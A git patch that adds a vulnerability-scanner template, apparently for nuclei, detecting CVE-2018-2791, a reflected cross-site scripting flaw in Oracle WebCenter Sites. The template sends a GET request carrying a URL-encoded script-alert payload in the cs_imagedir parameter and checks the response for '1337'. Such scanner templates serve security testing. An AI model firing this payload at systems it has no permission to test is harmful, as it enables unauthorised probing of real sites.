From f6661aa84c90bd0fd1b9ddf5ee070f34a423b63a Mon Sep 17 00:00:00 2001
From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com>
Date: Wed, 8 Apr 2020 17:07:09 +0530
Subject: [PATCH] Create Oracle WebCenter Sites XSS.yaml

---
 cves/Oracle WebCenter Sites XSS.yaml | 16 ++++++++++++++++
 1 file changed, 16 insertions(+)
 create mode 100644 cves/Oracle WebCenter Sites XSS.yaml

diff --git a/cves/Oracle WebCenter Sites XSS.yaml b/cves/Oracle WebCenter Sites XSS.yaml
new file mode 100644
index 0000000000..f39946623c
--- /dev/null
+++ b/cves/Oracle WebCenter Sites XSS.yaml	
@@ -0,0 +1,16 @@
+id: CVE-2018-2791
+
+info:
+  name: Oracle WebCenter Sites XSS
+  author: Ice3man
+  severity: high
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/servlet/Satellite?c=Noticia&cid={ID}&pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=eee%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C"
+    matchers:
+      - type: word
+        words:
+          - "1337"
+        part: body